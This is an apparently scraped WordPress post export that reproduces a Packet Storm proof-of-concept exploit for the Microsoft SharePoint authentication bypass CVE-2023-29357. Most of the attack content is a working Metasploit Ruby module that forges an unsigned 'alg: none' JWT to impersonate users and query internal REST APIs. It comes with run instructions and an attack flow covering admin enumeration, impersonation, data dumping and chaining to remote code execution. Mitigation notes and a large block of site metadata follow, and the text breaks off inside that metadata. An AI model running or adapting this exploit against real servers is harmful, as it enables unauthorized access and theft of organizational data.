{"id":27748,"date":"2025-11-26T12:50:38","date_gmt":"2025-11-26T12:50:38","guid":{"rendered":"http:\/\/localhost\/?p=27748"},"modified":"2025-11-26T12:50:38","modified_gmt":"2025-11-26T12:50:38","slug":"microsoft-sharepoint-authentication-bypass","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=27748","title":{"rendered":"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:13:29&#8243;,&#8221;description&#8221;:&#8221;This is a proof of concept exploit for a Microsoft Sharepoint authentication bypass vulnerability discovered in 2023&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212111&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-24955&#8243;,&#8221;CVE-2023-29357&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : SharePoint Authentication Bypass                                                                                            |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.microsoft.com\/en-us\/microsoft-365\/sharepoint\/collaboration                                                      |\\n    
=============================================================================================================================================\\n    \\n    POC : \\n    \\n    1. Summary :\\n       a critical authentication bypass vulnerability in Microsoft SharePoint known as CVE\u20112023\u201129357. (https:\/\/packetstorm.news\/files\/id\/207960\/)\\n       The flaw allows an attacker to craft an unsigned JWT token with \\&#8221;alg\\&#8221;: \\&#8221;none\\&#8221; and impersonate any SharePoint user, \\n       including Site Administrators, without possessing valid credentials.\\n       The vulnerability is dangerous because it exposes internal SharePoint APIs and may enable privilege escalation or full system compromise.\\n    \\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    How to Run the Exploit\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    \\n    ### **1. Save the script**\\n    \\n    Save the code as:\\n    \\n        ~\/.msf4\/modules\/auxiliary\/sharepoint\/cve_2023_29357.rb\\n    \\n    \\n    ### **2. 
Start it from terminal**\\n    \\n    msfconsole\\n    use auxiliary\/sharepoint\/cve_2023_29357\\n    set RHOSTS https:\/\/target.com\\n    run\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    auxiliary               :\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-\\n    ##\\n    # CVE\u20112023\u201129357 SharePoint Auth Bypass\\n    # by Indoushka \\n    ##\\n    \\n    class MetasploitModule \\u003c Msf::Auxiliary\\n      include Msf::Exploit::Remote::HttpClient\\n    \\n      def initialize(info = {})\\n        super(update_info(info,\\n          &#8216;Name&#8217;           =\\u003e &#8216;SharePoint Auth Bypass (CVE\u20112023\u201129357)&#8217;,\\n          &#8216;Description&#8217;    =\\u003e %q{\\n            This module exploits an authentication bypass in Microsoft SharePoint\\n            (CVE\u20112023\u201129357) using a crafted JWT token with \\&#8221;alg\\&#8221;:\\&#8221;none\\&#8221;.\\n          },\\n          &#8216;Author&#8217;         =\\u003e [\\n            &#8216;Indoushka (Conversion to MSF)&#8217;\\n          ],\\n          &#8216;License&#8217;        =\\u003e MSF_LICENSE,\\n          &#8216;References&#8217;     =\\u003e [\\n            [&#8216;CVE&#8217;, &#8216;2023-29357&#8217;]\\n          ]\\n        ))\\n    \\n        register_options(\\n          [\\n            OptString.new(&#8216;TARGETURI&#8217;, [ true, &#8216;Base SharePoint URL&#8217;, &#8216;\/&#8217; ])\\n          ]\\n        )\\n      end\\n    \\n      def create_jwt(aud, client_id)\\n        header = { alg: &#8216;none&#8217; }\\n        now = Time.now.to_i\\n        payload = {\\n          aud: aud,\\n          iss: client_id,\\n          nbf: now,\\n          exp: now + 3600,\\n          ver: \\&#8221;hashedprooftoken\\&#8221;,\\n          nameid: \\&#8221;#{client_id}@#{aud.split(&#8216;@&#8217;)[1]}\\&#8221;,\\n          endpointurl: \\&#8221;qqlAJmTxpB9A67xSyZk+tmrrNmYClY\/fqig7ceZNsSM=\\&#8221;,\\n          
endpointurlLength: 1,\\n          isloopback: true\\n        }\\n    \\n        encoded_header  = Rex::Text.encode_base64url(header.to_json)\\n        encoded_payload = Rex::Text.encode_base64url(payload.to_json)\\n    \\n        \\&#8221;#{encoded_header}.#{encoded_payload}.AAA\\&#8221;\\n      end\\n    \\n      def get_realm\\n        res = send_request_cgi({\\n          &#8216;method&#8217;  =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217;     =\\u003e normalize_uri(target_uri.path, \\&#8221;_api\/web\/siteusers\\&#8221;),\\n          &#8216;headers&#8217; =\\u003e { &#8216;Authorization&#8217; =\\u003e &#8216;Bearer &#8216; }\\n        }, 3)\\n    \\n        return nil unless res\\u0026.code == 401\\n    \\n        auth = res.headers[&#8216;WWW-Authenticate&#8217;]\\n        return nil unless auth\\n    \\n        realm = auth[\/realm=\\\\\\&#8221;([^\\\\\\&#8221;]+)\\\\\\&#8221;\/, 1]\\n        realm\\n      end\\n    \\n      def run\\n        client_id = \\&#8221;00000003-0000-0ff1-ce00-000000000000\\&#8221;\\n        print_status(\\&#8221;[*] Fetching realm\u2026\\&#8221;)\\n    \\n        realm = get_realm\\n    \\n        if realm.nil?\\n          print_error(\\&#8221;[-] Failed to extract realm\\&#8221;)\\n          return\\n        end\\n    \\n        print_good(\\&#8221;[+] Realm: #{realm}\\&#8221;)\\n    \\n        aud = \\&#8221;#{client_id}@#{realm}\\&#8221;\\n        jwt = create_jwt(aud, client_id)\\n    \\n        print_status(\\&#8221;[*] Trying authentication bypass\u2026\\&#8221;)\\n    \\n        res = send_request_cgi({\\n          &#8216;method&#8217;  =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217;     =\\u003e normalize_uri(target_uri.path, \\&#8221;_api\/web\/siteusers\\&#8221;),\\n          &#8216;headers&#8217; =\\u003e {\\n            &#8216;Authorization&#8217; =\\u003e \\&#8221;Bearer #{jwt}\\&#8221;,\\n            &#8216;X-PROOF_TOKEN&#8217; =\\u003e jwt,\\n            &#8216;Accept&#8217; =\\u003e 
&#8216;application\/json&#8217;\\n          }\\n        }, 5)\\n    \\n        if res \\u0026\\u0026 res.code == 200\\n          print_good(\\&#8221;[+] Authentication bypass success!\\&#8221;)\\n          if res.body\\n            print_line(res.body)\\n          end\\n        else\\n          print_error(\\&#8221;[-] Bypass failed. HTTP #{res\\u0026.code}\\&#8221;)\\n        end\\n      end\\n    end\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    [ Technical Description ]\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    \\n    \u2022 The attacker sends a request to:\\n          https:\/\/TARGET\/_api\/web\/siteusers\\n      This forces SharePoint to respond with a 401 and expose the Realm value.\\n    \\n    \u2022 The Realm is extracted from the \u201cWWW\u2011Authenticate\u201d header:\\n          Bearer realm=\\&#8221;XXXXXXXXXXXXXXXXXXXXXXXXXXXX\\&#8221;\\n    \\n    \u2022 The attacker forges a JWT token with:\\n          { \\&#8221;alg\\&#8221;: \\&#8221;none\\&#8221; }\\n    \\n    \u2022 The \u201caud\u201d field is constructed as:\\n          00000003-0000-0ff1-ce00-000000000000@REALM\\n    \\n    \u2022 The forged token is sent to SharePoint REST API endpoints.\\n    \\n    \u2022 SharePoint incorrectly validates the token (it accepts the unsigned alg none token without a signature check) and treats the attacker as an authenticated user.\\n    The write-up lists the following steps for the module; the listing above implements steps 1 to 3 only (it requests _api\/web\/siteusers and prints the response body) and contains no separate admin enumeration or privilege validation logic:\\n    \\n    1. Realm extraction  \\n    2. Token forgery  \\n    3. Authentication bypass  \\n    4. Admin enumeration  \\n    5. 
Privilege validation  \\n    \\n    Core logic excerpt (Metasploit Ruby):\\n    \\n        jwt_header = { alg: \\&#8221;none\\&#8221; }.to_json\\n        jwt_payload = {\\n            aud: \\&#8221;#{client_id}@#{realm}\\&#8221;,\\n            iss: client_id,\\n            nbf: Time.now.to_i,\\n            exp: Time.now.to_i + 3600,\\n            ver: \\&#8221;hashedprooftoken\\&#8221;,\\n            nameid: \\&#8221;#{client_id}@#{realm}\\&#8221;,\\n            endpointurl: \\&#8221;qqlAJmTxpB9A67xSyZk+tmrrNmYClY\/fqig7ceZNsSM=\\&#8221;,\\n            endpointurlLength: 1,\\n            isloopback: true\\n        }.to_json\\n    \\n        unsigned_token = \\&#8221;#{b64(jwt_header)}.#{b64(jwt_payload)}.AAA\\&#8221;\\n    \\n        send_request_cgi({\\n          &#8216;method&#8217;  =\\u003e &#8216;GET&#8217;,\\n          &#8216;uri&#8217;     =\\u003e normalize_uri(&#8216;_api&#8217;, &#8216;web&#8217;, &#8216;currentuser&#8217;),\\n          &#8216;headers&#8217; =\\u003e {\\n              \\&#8221;Authorization\\&#8221; =\\u003e \\&#8221;Bearer #{unsigned_token}\\&#8221;,\\n              \\&#8221;X-PROOF_TOKEN\\&#8221; =\\u003e unsigned_token\\n          }\\n        })\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    [ Attack Flow ]\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    \\n    1. Force 401 \u2192 Extract Realm  \\n    2. Build forged JWT  \\n    3. Bypass authentication  \\n    4. Enumerate site admins  \\n    5. Optional: Impersonate admin (SharePoint accepts spoofing)  \\n    6. 
Dump internal API data  \\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    [ Impact ]\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    \\n    \u2714 Full user enumeration  \\n    \u2714 Admin identification  \\n    \u2714 Access to restricted SharePoint API routes  \\n    \u2714 Potential privilege escalation  \\n    \u2714 Ability to chain with RCE vulnerabilities (CVE\u20112023\u201124955)  \\n    \u2714 Data leakage (lists, documents, users, groups\u2026)  \\n    \\n    Severity: **CRITICAL**\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    [ Mitigation ]\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    \\n    \u2022 Install the official Microsoft patch (the security updates for CVE-2023-29357 and CVE-2023-24955); the remaining items are compensating controls, not fixes  \\n    \u2022 Enforce strict JWT signature verification  \\n    \u2022 Reject any token with \\&#8221;alg:none\\&#8221;  \\n      (both token checks are SharePoint-internal behaviour; on an unpatched server they can only be approximated in front of it, for example at a reverse proxy or WAF)  \\n    \u2022 Disable loopback trust token mode  \\n    \u2022 Monitor ULS logs (and web server or proxy logs) for abnormal access patterns, for example REST calls to _api\/web\/siteusers or _api\/web\/currentuser that carry an X-PROOF_TOKEN header or a bearer token whose header declares alg none  \\n    \\n    
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    [ Conclusion ]\\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    \\n    CVE\u20112023\u201129357 is a severe authentication bypass allowing attackers to impersonate\\n    any SharePoint user without credentials.  \\n    The vulnerability is trivial to exploit and provides high\u2011value access to internal\\n    SharePoint data and admin functions.\\n    \\n    Patch immediately.\\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    
===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212111&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.8,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212111\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0
}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:13:29&#8243;,&#8221;description&#8221;:&#8221;This is a proof of concept exploit for a Microsoft Sharepoint authentication bypass vulnerability discovered in 2023&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212111&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-24955&#8243;,&#8221;CVE-2023-29357&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n | # Title :&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-27748","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=27748\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" 
content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:13:29&#8243;,&#8221;description&#8221;:&#8221;This is a proof of concept exploit for a Microsoft Sharepoint authentication bypass vulnerability discovered in 2023&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212111&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-24955&#8243;,&#8221;CVE-2023-29357&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title :...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=27748\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-26T12:50:38+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111\",\"datePublished\":\"2025-11-26T12:50:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748\"},\"wordCount\":1144,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27748#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748\",\"name\":\"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111 - zero 
redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-26T12:50:38+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27748\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27748#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero 
redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=27748","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-11-26T18:13:29&#8243;,&#8221;description&#8221;:&#8221;This is a proof of concept exploit for a Microsoft Sharepoint authentication bypass vulnerability discovered in 2023&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-11-26T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Microsoft Sharepoint Authentication 
Bypass&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212111&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-24955&#8243;,&#8221;CVE-2023-29357&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n | # Title :...","og_url":"https:\/\/zero.redgem.net\/?p=27748","og_site_name":"zero redgem","article_published_time":"2025-11-26T12:50:38+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=27748#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=27748"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111","datePublished":"2025-11-26T12:50:38+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=27748"},"wordCount":1144,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=27748#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=27748","url":"https:\/\/zero.redgem.net\/?p=27748","name":"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111 - zero 
redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-26T12:50:38+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=27748#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=27748"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=27748#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Microsoft Sharepoint Authentication Bypass_PACKETSTORM:212111"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero 